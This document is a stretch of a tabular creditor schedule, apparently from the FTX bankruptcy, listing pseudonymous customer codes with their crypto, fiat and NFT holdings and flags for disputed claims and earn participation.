| 07414968 | | CUSDT[4], DOGE[0.00004073], USD[0.00] | | |
| 07414971 | | BAT[.4], BTC[.0000665], ETHW[.000169], TRX[.000001], USD[177.44], USDT[0] | | |
| 07414973 | | USD[346.73] | | |
| 07414976 | | BRZ[1], CUSDT[16], DOGE[1], SHIB[6], USD[0.00], USDT[0] | | |
| 07414978 | | USD[10.72] | Yes | |
| 07414981 | | DOGE[8.86834965], SOL[0], USD[0.00] | | |
| 07414985 | | DOGE[71.52806406], ETH[.13910766], ETHW[.13910766], USD[11.77] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07414986 | | ETH[.00000001], ETHW[0], SOL[0] | | |
| 07414991 | | DOGE[.37761012], USD[0.00] | | |
| 07414992 | | SOL[.6562275], SUSHI[366.2967], USD[3819.26], USDT[5.62482500] | | |
| 07414995 | | BTC[0], ETH[.00000001], SOL[0], USD[0.00] | | |
| 07414996 | | BTC[.0000966], GRT[.97353085], USD[0.50] | | |
| 07414997 | | CUSDT[1], DOGE[0], USD[0.01] | | |
| 07414998 | | ETH[.000592], ETHW[.000592], SOL[0], USD[4.90], USDT[0] | | |
| 07414999 | | BTC[.00069019], CUSDT[1], DOGE[2], ETH[.02336564], ETHW[.02336564], TRX[517.28881578], USD[0.00] | | |
| 07415005 | | DOGE[1096.683], USD[0.28] | | |
| 07415006 | | BRZ[111.14344767], CUSDT[940.34675286], DOGE[4.67213679], USD[0.00] | | |
| 07415008 | | CUSDT[1], DOGE[4936.93219593], ETH[.96997453], ETHW[.96997453], TRX[74.68228775], USD[0.00] | | |
| 07415009 | | CUSDT[3], DOGE[2], GRT[1], SUSHI[0], TRX[1], USD[0.00], USDT[0.00000004] | | |
| 07415012 | | BTC[.06442445], ETH[.79505159], ETHW[.79505159], SOL[35.98616516], USD[1.15], USDT[0.00000087] | | |
| 07415013 | | BTC[.00002955], DOGE[.75409155], ETH[.00024222], ETHW[.00024222], GRT[6.94199406], SHIB[6925.07313543], TRX[10.97707973], USD[0.13], USDT[0.49457246], YFI[.000004] | Yes | |
| 07415019 | | BTC[0.00000425], MATIC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07415023 | | USD[0.01], USDT[0] | | |
| 07415024 | | USD[0.00] | | |
| 07415026 | | BTC[.0000995], USD[0.00], USDT[31.68988287] | | |
| 07415035 | | BTC[0], ETH[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07415039 | | SHIB[1], USD[0.00] | Yes | |
| 07415045 | | DOGE[180.70243814], USD[0.00] | | |
| 07415048 | | BAT[.88885], BTC[0.00001937], DOGE[5], ETH[0.11991260], ETHW[0.11991260], GRT[650.59203734], SUSHI[68.3651], TRX[0], USD[0.24], USDT[0] | | |
| 07415051 | | BRZ[2], CUSDT[3], DOGE[780.76133912], SHIB[6], TRX[1], USD[0.00] | Yes | |
| 07415053 | | NFT (437816671446672508/Microphone #1341)[1], NFT (494401198618472769/Series 1: Capitals #419)[1], NFT (502024321282261590/The Hill by FTX #559)[1], NFT (502926764331213817/Entrance Voucher #2874)[1], NFT (553447845671591614/Series 1: Wizards #377)[1], NFT (553608088701543767/France Ticket Stub #53)[1] | | |
| 07415065 | | USD[0.00] | | |
| 07415066 | | BAT[1], BRZ[3], USD[0.85] | | |
| 07415069 | | SOL[.31], USD[0.58] | | |
| 07415076 | | BAT[1.0149011], BF_POINT[900], BRZ[5], BTC[.00000156], CUSDT[48.76691387], DOGE[5.68741489], ETHW[.90946825], GRT[2], LINK[123.95859915], NFT (536612629204681968/NFT BZL 2021 #52)[1], SHIB[10], SOL[29.77306252], SUSHI[2.80923518], TRX[14.07715004], USD[1.95], USDT[1.07602825] | Yes | |
| 07415078 | | ETHW[.35], NFT (557225987023773301/SALT New York 2022 #8)[1], USD[0.01] | | |
| 07415079 | | BAT[1], DOGE[1], USD[0.46] | | |
| 07415080 | | USD[1.18] | Yes | |
| 07415083 | | BAT[.776], BTC[0], ETH[0.18867542], ETHW[0.18867542], SUSHI[1.992], TRX[176.292], UNI[0], USD[0.00], USDT[.00656] | | |
| 07415091 | | BTC[.00007236], USD[0.00] | | |
| 07415103 | | DOGE[11246.34670089], TRX[25.46105466], USD[0.00] | Yes | |
| 07415105 | | LTC[.00817088], USD[3.59] | | |
| 07415106 | | BRZ[0], DOGE[1], KSHIB[1.39485351], SHIB[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07415110 | | USD[0.00] | | |
| 07415111 | | BRZ[3], BTC[0], CUSDT[7], DAI[0], DOGE[1], ETH[0], SOL[0], TRX[9], USD[0.00], USDT[0.00027105] | Yes | |
| 07415115 | | CUSDT[3], DOGE[1040.74235038], SUSHI[.88320225], TRX[297.3177775], UNI[1.07869573], USD[0.00] | | |
| 07415124 | | CUSDT[1], USD[0.00] | | |
| 07415127 | | USD[0.00] | | |
| 07415128 | | CUSDT[18], DOGE[35.84682208], TRX[1.00001145], USD[0.01] | Yes | |
| 07415130 | | BAT[765.924], BTC[.042], DOGE[5200.5], ETH[.155], ETHW[.155], LINK[11.1888], SOL[.7494], SUSHI[.29], UNI[15.438], USD[0.00], USDT[0] | | |
| 07415132 | | BAT[2.12359491], CUSDT[1], DOGE[2], GRT[4.24536934], SOL[.00029974], SUSHI[204.61045949], TRX[3], UNI[1.10138202], USD[0.00], USDT[2.20434485] | Yes | |
| 07415135 | | GRT[1820.185], USD[0.00], USDT[9.1286946] | | |
| 07415139 | | USD[0.00] | | |
| 07415141 | | ETH[.0008898], ETHW[.0008898], NFT (314000408426142234/Romeo #1262)[1], NFT (317770853377975578/Good Boy #7350)[1], SUSHI[.3917], USD[0.00] | | |
| 07415143 | | BRZ[1], CUSDT[1], DOGE[0], TRX[1], USD[0.01], USDT[1] | | |
| 07415155 | | DOGE[2], USD[0.00] | | |
| 07415165 | | BTC[0], ETH[.00567978], ETHW[.00567978], USD[0.00] | | |
| 07415167 | | DOGE[0] | | |
| 07415169 | | DOGE[1], USD[0.00] | Yes | |
| 07415172 | | USD[0.00] | | |
| 07415175 | | AAVE[0], AVAX[0], BF_POINT[600], BTC[0], DOGE[0], ETH[0.00000020], ETHW[0.00000021], KSHIB[0], LTC[0], NFT (417837537024635812/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #61)[1], SHIB[9], SOL[0], SUSHI[0], USD[0.01] | Yes | |
| 07415180 | Contingent, Disputed | BTC[0], ETH[0], ETHW[0], SOL[0], USD[1.72] | | |
| 07415181 | | BTC[0], ETH[.00000001], SOL[0], USD[0.00], USDT[0] | | |
| 07415183 | | BRZ[2], CUSDT[0], SHIB[3592.17240668], TRX[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07415184 | | USD[0.00], USDT[.02568739] | | |
| 07415188 | | DOGE[0], GRT[0], TRX[0], USD[0.00], USDT[0] | | |
| 07415195 | | BF_POINT[500], SHIB[4], USD[0.00] | Yes | |
| 07415214 | | TRX[.79828], USDT[1.343476] | | |
| 07415215 | | BTC[0.00000531], USDT[0] | | |
| 07415216 | | ETH[0], SOL[0], USD[0.01], USDT[0] | | |
| 07415233 | | ETH[4.92044854], ETHW[4.91848213], SOL[121.375575], SUSHI[282.13833307], USD[0.00], USDT[2.14301252] | Yes | |
| 07415238 | | LTC[0], USD[0.00], USDT[0.00000005] | | |
| 07415240 | | BTC[0.04493951], DOGE[1], USD[0.00], USDT[0.00038029] | | |
| 07415241 | | AVAX[0], USD[0.00] | | |
| 07415244 | | BAT[0], BTC[0], DOGE[0], ETH[0], LINK[0], USD[0.71] | | |
| 07415245 | | DOGE[263.08153976], SHIB[17264831.76123042], USD[0.00], USDT[0] | Yes | |
| 07415251 | | BRZ[1], BTC[.00445976], TRX[1], USD[21.26] | Yes | |
| 07415258 | | AVAX[68.2391], BAT[0], BTC[0.00156990], DOGE[0], ETH[0.00022570], ETHW[0.00022570], LINK[100.4716], MATIC[.924], SOL[0.00697290], TRX[0], USD[5125.46], USDT[2.11068370] | | |
| 07415259 | | BAT[2.10089716], CUSDT[2], DOGE[0], ETH[0], GRT[1.00498957], SOL[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07415263 | | BTC[0], USD[0.00] | | |
| 07415267 | | CUSDT[1], USD[0.00] | | |
| 07415269 | | DOGE[0], USD[0.01], USDT[0] | | |
| 07415272 | | BF_POINT[300], USD[0.01] | Yes | |
| 07415275 | | ETH[.00073325], ETHW[.00073325], USD[299.41] | | |
| 07415277 | | BAT[1.01655549], BRZ[6.61381237], CUSDT[4], DOGE[3], ETH[0], GRT[1.00485283], SOL[0], TRX[2], USD[0.00], USDT[3.30766429] | Yes | |
| 07415281 | | CUSDT[1], NFT (295852195059231061/Astral Apes #1130)[1], NFT (296564135856444002/2D SOLDIER #2217)[1], NFT (299643674756448126/Momentum #211)[1], NFT (299999959398521301/Astral Apes #3291)[1], NFT (336339815418324860/#5326)[1], NFT (362678139825216836/ApexDucks #1833)[1], NFT (363110975868237466/3D CATPUNK #8049)[1], NFT (371901633934451706/Astral Apes #2806)[1], NFT (375216819915763966/3D CATPUNK #3427)[1], NFT (376933893223113146/3D CATPUNK #2717)[1], NFT (384372899715609689/APEFUEL by Almond Breeze #487)[1], NFT (394043512988115756/Astral Apes #455)[1], NFT (395079333925411216/Astral Apes #1108)[1], NFT (444600334542476024/DRIP NFT)[1], NFT (450226149472286282/3D CATPUNK #5399)[1], NFT (459640052948279769/ALPHA-RONIN #134)[1], NFT (460671469825882908/3D CATPUNK #1476)[1], NFT (462626995865478044/DRIP NFT)[1], NFT (472760866136239477/2D SOLDIER #544)[1], NFT (496931285654868446/DRIP NFT)[1], NFT (499342033269298047/#2971)[1], NFT (507792195577895928/Astral Apes #1545)[1], NFT (518963907099362510/3D CATPUNK #4428)[1], NFT (537844147243949841/Astral Apes #533)[1], NFT (538144661554488342/3D SOLDIER #2932)[1], NFT (545296635606652762/3D CATPUNK #3601)[1], SHIB[5], SOL[0.08963538], USD[0.00], USDT[0.00000020] | Yes | |
| 07415282 | | ETH[.000423], ETHW[.000423], USD[0.36] | | |
| 07415287 | | USD[0.00] | | |
| 07415293 | | ETH[.01948952], ETHW[.01924328], SHIB[1], USD[0.00] | Yes | |
| 07415297 | | SOL[515.22289341] | | |
| 07415303 | Contingent, Disputed | USD[0.28] | | |
| 07415305 | | BTC[0], ETH[0], SOL[0], USD[16.13] | | |
| 07415312 | | USDT[5] | | |
| 07415316 | | BAT[1], GRT[1], SOL[.00296985], TRX[1], USD[0.01], USDT[.00000049] | | |
| 07415318 | | BRZ[1], DOGE[.00002856], USD[0.00] | | |
| 07415321 | | USD[0.00] | | |
| 07415325 | | BAT[0], BTC[0], USD[0.00] | | |
| 07415332 | | DOGE[0], ETH[0], LTC[0], SOL[0], USD[0.00] | | |
| 07415337 | | BTC[.00018355], CUSDT[1], ETH[.00321461], ETHW[.00317357], LTC[.06419144], TRX[1], USD[0.00] | Yes | |
| 07415340 | | BTC[.0000389], NFT (429306756744577960/Humpty Dumpty #637)[1], NFT (478621841764682468/Juliet #325)[1], USD[0.00] | | |
| 07415345 | | BAT[2], BRZ[5], CUSDT[2], ETH[0], ETHW[0], GRT[4], TRX[1], USD[0.00] | | |
| 07415349 | | BRZ[1], USD[0.00] | | |
| 07415351 | | CUSDT[2], SHIB[8617072.50835199], TRX[3248.11333054], USD[0.00], USDT[0] | | |
| 07415357 | | BCH[.1465284], BRZ[2], BTC[.00526464], CUSDT[3], DOGE[1], ETH[.62177964], ETHW[.62151836], TRX[2], USD[0.00] | Yes | |
| 07415359 | | USD[0.00] | | |
| 07415362 | | SOL[4.14612127], USD[0.03] | | |
| 07415370 | | TRX[4], USD[0.00] | | |
| 07415371 | | DOGE[197.81384055], USD[0.00] | | |
| 07415376 | | USD[500.01] | | |
| 07415381 | | BTC[.00014923], LINK[.08], SOL[.82775], USD[6.97] | | |
| 07415383 | | ETH[0], ETHW[0.00092175], GRT[0], MATIC[0], NFT (288923269298985289/Entrance Voucher #2413)[1], SOL[0], TRX[0.89718407], USD[0.00], USDT[0] | | |
| 07415384 | | BF_POINT[400], CUSDT[1], DOGE[1], ETH[0.07915216], SHIB[1], SOL[.00002683], SUSHI[8.00528554], TRX[1], USD[0.00] | Yes | |
| 07415388 | | BTC[.00108197], ETH[.03747907], ETHW[.03701395], USD[1.56] | Yes | |
| 07415391 | | DOGE[197.91104428], SOL[10.87985407], USD[0.00] | Yes | |
| 07415396 | | BTC[0], TRX[0], USD[15.00], USDT[.01656847] | | |
| 07415397 | | ETH[0], SOL[71.84961628], SUSHI[124.69088039], USD[0.00] | | |
| 07415401 | | BAT[1], BTC[.00189279], CUSDT[1], DOGE[305.8992689], TRX[3062.53809689], USD[0.00], USDT[0.08042957] | | |
| 07415403 | | ETH[.03496675], ETHW[.03496675], SOL[.953419], USD[0.95] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07415406 | | SOL[14.985], USD[48.60] | | |
| 07415408 | | BAT[176.40127646], TRX[1], USD[0.00] | Yes | |
| 07415421 | | BF_POINT[6900] | Yes | |
| 07415430 | | DOGE[0], USD[0.01], USDT[0] | | |
| 07415434 | | NFT (309703512878794534/Solana Penguin Business #2543)[1], NFT (562913648648079224/Cecil1511)[1], USD[0.81], USDT[0] | | |
| 07415435 | | ETH[.00000001], SOL[0], SUSHI[0], USD[0.00] | | |
| 07415436 | | BAT[9.47691697], BRZ[7.37093533], BTC[.08477957], CUSDT[7], DOGE[2], GRT[2.01293663], SUSHI[3.15897232], TRX[7], USD[0.00], USDT[2.10598158] | | |
| 07415437 | | USD[0.00] | | |
| 07415438 | | BTC[0.00004510], DOGE[ 10738488], ETHW[.00094747], SOL[.00023], USD[0.82] | | |
| 07415440 | | USD[0.00], USDT[0] | | |
| 07415441 | | USD[0.00], USDT[.30946194] | | |
| 07415443 | | CUSDT[7], DOGE[7.33032244], ETH[0], SUSHI[5.6166633], TRX[2], UNI[.87977346], USD[0.00], USDT[1.02543197] | Yes | |
| 07415449 | | CUSDT[1], GRT[1323.90765997], USD[100.00] | | |
| 07415450 | | BAT[1], BTC[.00868512], USD[0.00] | | |
| 07415452 | | NFT (544620641710510513/FTX x CAL: The Decision #81)[1], NFT (562425279294440949/Coachella x FTX Weekend 2 #19114)[1] | | |
| 07415453 | | CUSDT[1], DOGE[2], SUSHI[4.0000711], UNI[0], USD[0.00] | Yes | |
| 07415456 | | CUSDT[1], DOGE[1296.14704902], TRX[1], USD[0.00] | | |
| 07415463 | | BAT[8.21661215] | | |
| 07415464 | | SOL[0], USD[0.00], USDT[0.00000134] | Yes | |
| 07415471 | | BRZ[1], CUSDT[3], DOGE[575.45316517], TRX[785.27887755], USD[21.05] | | |
| 07415475 | | USD[0.00] | | |
| 07415481 | | USD[2.76] | | |
| 07415484 | | BTC[0.00003524], ETHW[.00323055] | | |
| 07415485 | | BCH[.04693688], BRZ[1], DOGE[439.30926756], ETH[.0279248], ETHW[.0279248], USD[0.00] | | |
| 07415486 | | BTC[.0000763], LTC[.00744], SUSHI[.46974354], USD[0.06], USDT[0] | | |
| 07415488 | | BF_POINT[100], USD[0.00], USDT[0] | | |
| 07415496 | | ETH[0], TRX[.000001], USD[3.02], USDT[0] | | |
| 07415500 | | BCH[.01913621], SHIB[1], TRX[1], USD[0.26] | Yes | |
| 07415504 | | BRZ[1], BTC[.00017448], CUSDT[23], DOGE[7779.16782087], ETH[.00233197], ETHW[.00230459], SOL[.04852491], TRX[4], USD[0.00] | Yes | |
| 07415514 | | BTC[.00000001], DOGE[0], ETH[0], ETHW[0], MATIC[0], NFT (558258400977637145/Entrance Voucher #15419)[1], SOL[0], UNI[0], USD[7.79], USDT[0] | Yes | |
| 07415515 | | DOGE[1], TRX[0], USD[0.00], USDT[0.00060739] | | |
| 07415519 | | DOGE[1], USD[0.00] | | |
| 07415523 | | BRZ[1], BTC[0.00000001], DOGE[0.00407964], ETH[0], ETHW[0], LTC[0], NFT (405457936960529480/3D CATPUNK #1691)[1], SHIB[1], TRX[3], USD[1.04] | Yes | |
| 07415526 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07415533 | | USD[0.00], USDT[1.4024] | | |
| 07415539 | | BRZ[2], CUSDT[6], DOGE[5499.52027612], USD[0.00], USDT[0] | Yes | |
| 07415540 | | BTC[0.20120000], DOGE[.454], SOL[.004], USD[0.68] | | |
| 07415545 | | BRZ[1], DOGE[1], GRT[1], USD[0.00] | | |
| 07415548 | | LINK[10.4895], USD[0.56] | | |
| 07415550 | | CUSDT[3], DOGE[1172.22457254], TRX[1], USD[0.01] | Yes | |
| 07415552 | | CUSDT[.00001631], SUSHI[0], USD[32.89] | Yes | |
| 07415570 | | BRZ[1], CUSDT[16], GRT[1], TRX[6], USD[0.00], USDT[1] | | |
| 07415572 | | CUSDT[1], USD[0.00] | Yes | |
| 07415575 | | BTC[0], DOGE[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.03] | | |
| 07415577 | | BRZ[1], BTC[.00000415], CUSDT[13], DOGE[1], ETH[.00000271], ETHW[.00000271], LINK[.0715941], USD[0.01] | | |
| 07415579 | | BRZ[1], BTC[0.00000091], ETH[0], SHIB[45], SOL[17.01589795], TRX[3], USD[0.00] | Yes | |
| 07415582 | Contingent, Disputed | TRX[1174.824], USD[15.28], USDT[0] | | |
| 07415584 | | DOGE[307.87432909], USD[0.00] | Yes | |
| 07415585 | | USD[1000.00] | | |
| 07415589 | | USD[0.36] | | |
| 07415590 | | USD[2.00] | | |
| 07415593 | | ETH[.0029228], ETHW[.0029228] | | |
| 07415598 | | NFT (460045119139950808/Entrance Voucher #2802)[1], USD[0.00] | | |
| 07415598 | | ETH[0], SOL[0] | | |
| 07415605 | | ETH[.02], ETHW[.02], SOL[0] | | |
| 07415607 | | BTC[0], ETH[.000034], ETHW[.000034], USD[3.77] | | |
| 07415612 | | GRT[.00002757], TRX[1], USD[0.03], USDT[0] | Yes | |
| 07415620 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07415621 | | BAT[0], CUSDT[10], SOL[.00000001], USD[0.00], USDT[0] | Yes | |
| 07415622 | | CUSDT[2], DOGE[.00019029], USD[0.01] | | |
| 07415623 | | BRZ[1], CUSDT[9], SOL[.06763174], TRX[3], USD[0.00] | Yes | |
| 07415625 | | DOGE[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07415629 | | DOGE[2], TRX[1], USD[0.01] | | |
| 07415633 | | DOGE[72750] | | |
| 07415634 | | USDT[3.461547] | | |
| 07415638 | | BRZ[1], DOGE[1], USD[0.01] | | |
| 07415644 | | DOGE[0], ETHW[8.49104451], KSHIB[5229.59242491], SHIB[5403148.12245875], SOL[7.21694636], TRX[26917.64443216], USD[0.00], USDT[1.06145811] | Yes | |
| 07415651 | | BRZ[1], CUSDT[4], DOGE[691.54847108], TRX[5140.36631409], USD[0.00], USDT[0] | | |
| 07415655 | | TRX[1], USD[0.00], USDT[0.00805041] | Yes | |
| 07415657 | | CUSDT[0], DOGE[1], USD[0.01] | | |
| 07415661 | | BRZ[3], CUSDT[8], GRT[4.26108643], SUSHI[1.11007626], TRX[9.01851208], USD[0.00], USDT[2.2206595] | Yes | |
| 07415662 | | USD[0.00] | | |
| 07415663 | | USD[250.00] | | |
| 07415664 | | ETH[.000991], ETHW[.000991], USD[0.00], USDT[17.18912494] | | |
| 07415678 | | CUSDT[1], USD[0.00] | | |
| 07415679 | | DOGE[390] | | |
| 07415687 | | BRZ[1], BTC[.00000012], CUSDT[6], DOGE[.00429082], NFT (453683990409753139/Rubber Duckie #0004 - Blue)[1], NFT (481320300009991193/Rubber Duckie #0045)[1], SHIB[2], SOL[.00009701], USD[0.00] | Yes | |
| 07415691 | | TRX[2], USD[0.00] | | |
| 07415692 | | BTC[.0019796] | | |
| 07415708 | | BRZ[1], CUSDT[2], DOGE[2513.26343420], GRT[0], SHIB[4397513.67931919], TRX[2594.61364044], USD[0.03] | Yes | |
| 07415717 | | ETH[.00074378], ETHW[.00074378], SHIB[.0000887], SOL[0.00542936], USD[0.18] | | |
| 07415719 | | ETH[0], NFT (547758783079448030/Humpty Dumpty #919)[1], USD[10.00], USDT[.00551322] | | |
| 07415720 | | USD[1.21] | | |
| 07415722 | | GRT[25025.7724537] | Yes | |
| 07415724 | | BTC[.02478047], DOGE[1], USD[0.00] | | |
| 07415728 | | USD[3.08], USDT[0.00000001] | | |
| 07415732 | | CAD[0.00], DOGE[1], EUR[0.00], GBP[0.00], SGD[0.00], USD[0.00], USDT[0] | | |
| 07415737 | | BRZ[1], DOGE[1], USD[0.01] | Yes | |
| 07415739 | Contingent, Disputed | USD[0.04], USDT[115453.219137] | | |
| 07415740 | | BRZ[4], CUSDT[538.50685533], DAI[.00090746], DOGE[158.59383355], ETH[1.07924935], ETHW[1.07879613], GRT[39.54936968], LTC[2.53469644], SOL[1.01184659], SUSHI[6.2520178], TRX[8568.55931281], UNI[2.17205711], USD[0.00], USDT[1.11043116] | Yes | |
| 07415742 | | BTC[0], DOGE[0], SHIB[136798.11399623], TRX[0], USD[0.00], YFI[0] | | |
| 07415743 | | DOGE[8293], MATIC[220], USD[7.76] | | |
| 07415745 | | BTC[.00000001], CUSDT[2], ETH[.00000006], ETHW[.00000006], SOL[.00000086], USD[0.00] | Yes | |
| 07415762 | | BRZ[1], CUSDT[4], GRT[0.00557384], LINK[58.91953455], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07415764 | | BCH[0], BTC[0], DOGE[0], ETH[.00000058], ETHW[5.80652584], LTC[0], MATIC[0], SOL[0.00000032], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000016] | | |
| 07415765 | | BAT[1.01655549], BRZ[1], DOGE[4.04518359], GRT[1.00498957], USD[0.00] | Yes | |
| 07415769 | | CUSDT[1], DOGE[0], GRT[.00031994], LTC[0], USD[0.00] | | |
| 07415771 | | CUSDT[2], DOGE[3696.07006807], TRX[3926.40593748], USD[0.00] | | |
| 07415780 | | BAT[0], BTC[0], CUSDT[1], DOGE[9], GRT[.00004266], TRX[0] | | |
| 07415786 | | BTC[0.00007053], SOL[0], USD[0.00] | | |
| 07415806 | | BTC[.00050122], CUSDT[1], DOGE[103.82764366], USD[0.00] | | |
| 07415809 | | SHIB[0], USD[0.15] | | |
| 07415814 | | BTC[.28203277], LINK[3.87738784] | Yes | |
| 07415819 | | NFT (485865020827669706/Humpty Dumpty #679)[1] | | |
| 07415829 | | DOGE[1034.56499979], ETH[0], GRT[0], MATIC[0], SHIB[7], TRX[1], USD[0.00], USDT[0] | | |
| 07415834 | | BCH[.01699127], CUSDT[1], DOGE[368.81713736], USD[0.00] | | |
| 07415849 | | BRZ[2], BTC[.00068123], CUSDT[2], DOGE[4338.69429858], TRX[1] | | |
| 07415857 | | USD[0.00] | | |
| 07415864 | | ETH[.000072], ETHW[.000072], LTC[.00696], TRX[.961], USD[0.01] | | |
| 07415867 | | BRZ[1], DOGE[1364.33322746], SHIB[6845094.90979642], SOL[1.11151148], TRX[1], USD[0.01] | Yes | |
| 07415875 | | CUSDT[2], DOGE[.00720361], USD[0.00] | | |
| 07415897 | | BAT[.00004675], DOGE[1565.04188593], ETH[.7240129], ETHW[.72370884], GRT[5.9236919], LINK[11.50157846], SOL[.00025005], SUSHI[12.06002377], TRX[.80425488], USD[0.92] | Yes | |
| 07415899 | | NFT (574945049736692296/Toy Soldier #013)[1], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07415903 | | USD[0.00] | | |
| 07415904 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Tokens / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07415920 | Contingent, Disputed | USD[0.00] | | |
| 07415922 | | SOL[0.24787298], USD[0.00], USDT[0.00000150] | | |
| 07415929 | | BAT[1.0165555], BRZ[3], CUSDT[16], GRT[3.12050508], NFT (365706394258160415/MagicEden Vaults)[1], NFT (390340458570693325/MagicEden Vaults)[1], NFT (440069405242459785/MagicEden Vaults)[1], NFT (453415590515253881/MagicEden Vaults)[1], NFT (562101932801409469/MagicEden Vaults)[1], SHIB[4], TRX[2.07028307], USD[0.00], USDT[0.00000055] | Yes | |
| 07415930 | | USD[0.01], USDT[0] | | |
| 07415935 | Contingent, Unliquidated | USD[0.00] | | |
| 07415949 | | BTC[.00017707], UNI[.27323603], USD[0.00] | | |
| 07415951 | | BTC[.00121555] | | |
| 07415952 | | DOGE[2], USD[0.00] | | |
| 07415955 | | CUSDT[1], DOGE[2], ETHW[2.03830391], USD[0.05] | Yes | |
| 07415956 | | TRX[.000001], USD[0.01], USDT[0.00000001] | | |
| 07415958 | | BRZ[2], CUSDT[5], TRX[1], USD[0.01] | | |
| 07415962 | | DOGE[1.38476917], USD[0.00], USDT[0] | | |
| 07415965 | | ETH[0], USD[0.00], USDT[0.00002106] | | |
| 07415969 | | USD[2.87] | | |
| 07415978 | | BAT[1.01655549], CUSDT[1], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07415987 | | ETH[.08584108], ETHW[.08584108], SHIB[2], USD[0.24] | | |
| 07415996 | | BTC[1.32140926], SOL[.7528], USD[0.00] | | |
| 07415997 | | AVAX[0.88649852], BTC[0], ETH[0.00042642], ETHW[0.00010196], LTC[0.00021185], MATIC[0.95268688], MKR[0.00211354], SOL[0.00949530], USD[0.00], USDT[0] | | |
| 07415998 | | BTC[0], SOL[0], USD[0.00], USDT[0.00000006] | | |
| 07416000 | | SUSHI[110.72025180], USD[8.88] | | |
| 07416001 | | ETH[0.04608000], ETHW[0.04608000], SOL[0], USD[0.00], USDT[2.047008] | | |
| 07416005 | | BTC[0], ETH[.0003856], ETHW[.0003856], LINK[0], LTC[.00536593], NFT (479797012132036811/Coachella x FTX Weekend 2 #28015)[1], SOL[.0030184], USD[68159.78], USDT[0.00000001] | | |
| 07416008 | | BTC[0.00151066], SUSHI[0], USD[0.00] | | |
| 07416010 | | CUSDT[1], DOGE[37.79796238], KSHIB[218.24267506], SHIB[290152.3019147], USD[0.00] | | |
| 07416019 | | BAT[2.00001192], BTC[.00000315], DOGE[4], ETH[0], GRT[3], SHIB[1], TRX[1], USD[0.14], USDT[1.00045443] | Yes | |
| 07416026 | | BTC[.0068], SHIB[13400000], USD[0.15] | | |
| 07416029 | | NFT (312514732765052862/GSW Western Conference Finals Commemorative Banner #960)[1], NFT (346359210893880433/Warriors Logo Pin #313 (Redeemed))[1], NFT (383727060380025024/GSW Round 1 Commemorative Ticket #630)[1], NFT (383874481240120989/GSW Championship Commemorative Ring)[1], NFT (387543344579811458/GSW Western Conference Finals Commemorative Banner #663)[1], NFT (393685743243227283/GSW Western Conference Finals Commemorative Banner #1728)[1], NFT (430842562234180868/GSW Championship Commemorative Ring)[1], NFT (435765719361117055/GSW Western Conference Finals Commemorative Banner #1155)[1], NFT (438398859461423256/GSW Western Conference Finals Commemorative Banner #1154)[1], NFT (445899842539343912/GSW Western Conference Finals Commemorative Banner #1156)[1], NFT (452284592279355994/GSW Western Conference Finals Commemorative Banner #1727)[1], NFT (489806091808309670/FTX - Off The Grid Miami #895)[1], NFT (503660525326596433/The Hill by FTX #6846)[1], NFT (516481797247067003/GSW 75 Anniversary Diamond  #376 (Redeemed))[1], NFT (536288550650661091/GSW Western Conference Semifinals Commemorative Ticket #1064)[1], NFT (550826354929353256/GSW Western Conference Finals Commemorative Banner #959)[1], PAXG[.18710038], SHIB[26383203.18856407], USD[28.87] | Yes | |
| 07416033 | | ETH[.00004321], ETHW[0.00004321], USD[0.52] | | |
| 07416039 | | DOGE[1931.306391], TRX[7646.28841527], USD[0.01] | Yes | |
| 07416043 | | DOGE[0], MATIC[0], NFT (345411043090348970/Valley #6)[1], NFT (363346340660087547/Lucia's Cute & Cozy Collection #1 #3)[1], NFT (499010501853458559/Lucia's Cute & Cozy Collection #1 #2)[1], USD[9.17], USDT[0] | | |
| 07416044 | | ETH[0], ETHW[0], LINK[0], USD[0.00], USDT[0.00035572] | | |
| 07416047 | | CUSDT[1], SOL[0], TRX[1], USD[0.00] | | |
| 07416057 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07416062 | | BTC[0], SOL[0.42901859] | | |
| 07416064 | | SOL[20.81158989], USD[0.00] | | |
| 07416069 | | AAVE[0], BTC[.27760419], ETH[7.48282882], ETHW[7.48282882], USD[28.96] | | |
| 07416073 | | USD[5.00] | | |
| 07416079 | | CUSDT[1], USD[0.00] | | |
| 07416080 | | TRX[.000068], USD[1.12], USDT[0] | | |
| 07416081 | | DOGE[2198.799], ETH[.999], ETHW[.999], GRT[2497.5], LINK[102.7971], LTC[10.0899], SOL[102.779], SUSHI[242.2575], USD[73.13] | | |
| 07416090 | | BTC[0.00004108], DOGE[.4306], USD[0.00] | | |
| 07416094 | | CUSDT[1], USD[0.01] | | |
| 07416102 | | AAVE[0], BAT[0], BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[1.09277165], KSHIB[0], LINK[0], LTC[0], MATIC[0], SHIB[1.68113912], SOL[0.00000001], TRX[1], UNI[0], USDT[0], YFI[0] | Yes | |
| 07416110 | | USD[0.00] | | |
